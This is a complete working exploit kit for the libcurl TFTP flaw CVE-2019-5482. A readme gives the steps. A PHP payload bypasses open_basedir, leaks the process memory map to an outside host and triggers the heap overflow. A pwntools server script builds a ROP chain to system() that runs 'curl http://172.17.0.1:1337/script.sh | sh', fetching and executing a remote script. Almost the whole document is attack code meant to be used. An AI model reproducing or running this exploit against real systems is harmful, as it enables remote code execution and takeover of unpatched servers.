curl 1-day exploit

_readme.md

0. Confirm that you have unpatched version of libcurl, which contains CVE-2019-5482
1. Update ip addresses at the source files
2. Launch srv.py on the server
3. Upload sol.php via curl: curl http://$URL:$PORT/ -d '[email protected]'

sol.php

// <?php

error_reporting(-1);
ini_set('display_errors', 'On');

chdir("/tmp");
mkdir("/tmp/zzzzz");
chdir("/tmp/zzzzz");

echo getcwd() . "\n";
if (!ini_set('open_basedir', '..')) {
    echo "failed";
}

while (!ini_set('open_basedir', '/')) {
    chdir('..');
}
echo "open_basedir bypassed\n";

$maps = file_get_contents("/proc/self/maps");

$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($sock, '172.17.0.1', 12345);
if (socket_send($sock, $maps, strlen($maps), 0) === false) {
    die("failed to send maps");
}

//$o = curl_init();
//curl_setopt($y, CURLOPT_COOKIELIST, "/bin/sh");

$a = curl_init();
$h = curl_init();
$b = curl_init();
$c = curl_init();
$d = curl_init();
$e = curl_init();
$f = curl_init();
$q = curl_init();

$w = curl_init();
$r = curl_init();
$t = curl_init();
$y = curl_init();

curl_setopt($a, CURLOPT_BUFFERSIZE, 0x1234);
curl_setopt($a, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($b, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($c, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($d, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($r, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($e, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($y, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($t, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($w, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($q, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));

$url = "tftp://172.17.0.1:1234";
curl_setopt($h, CURLOPT_URL, $url);
curl_setopt($h, CURLOPT_TFTP_BLKSIZE, 0x60 - 4);

echo "doing!\n";
$res = curl_exec($h);
echo "res = $res";
curl_close($h);

srv.py

#!/usr/bin/env python

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

def main():
    l = listen(1234, typ='udp')
    ll = listen(12345, typ='tcp')

    context.log_level = 'warning'
    maps = ll.recvall(timeout=10)
    context.log_level = 'debug'
    for line in maps.split('\n'):
        if 'r-x' in line and 'libsqlite3' in line:
            words = line.split('-')
            sqlite_base = int(words[0], 16)
        if 'r-x' in line and 'libc-2.27.so' in line:
            words = line.split('-')
            libc_base = int(words[0], 16)


    pivot = sqlite_base + 0x00000000000e4326 # pop; pop; pop; pop; pop rsp; pop ; pop ; ret
    pop_rdi = libc_base + 0x000000000002155f # pop rdi ; ret
    mov_gadget = sqlite_base + 0x000000000004d607 #  mov rdi, rdx ; call r8
    pop_r8 = sqlite_base + 0x00000000000147b8 # pop r8 ; ret
    system_addr = libc_base + 324672

    print 'sqlite_base', hex(sqlite_base)
    print 'libc_base', hex(libc_base)

    data = l.recv(0x26)

    oack = ''
    oack += '\0\x06hhh\0ppppp\0'
    l.send(oack)

    sleep(0.5)

    p = ''
    p += 'A' * (296 - 184)
    p += 'curl http://172.17.0.1:1337/script.sh | sh\0'
    p += 'A' * (296 - len(p))

    p += 'B' * 8
    p += p64(pivot)
    p += 'A' * 0x10
    p += p64(pop_r8)
    p += p64(system_addr)
    #p += 'Q' * 8
    p += p64(mov_gadget)

    p += cyclic(392 - len(p), n=8)
    p += p64(0) # this is required to skip hash iteration cycle and jump right to call %%rax
    p += 'A' * (0x200 - len(p))

    #p = cyclic(0x200, n=8)
    #p = p.replace(p64(0x6261616161616179), p64(0))

    raw_input()
    l.send(p)
    sleep(1)
    l.close()


if __name__ == '__main__':
    main()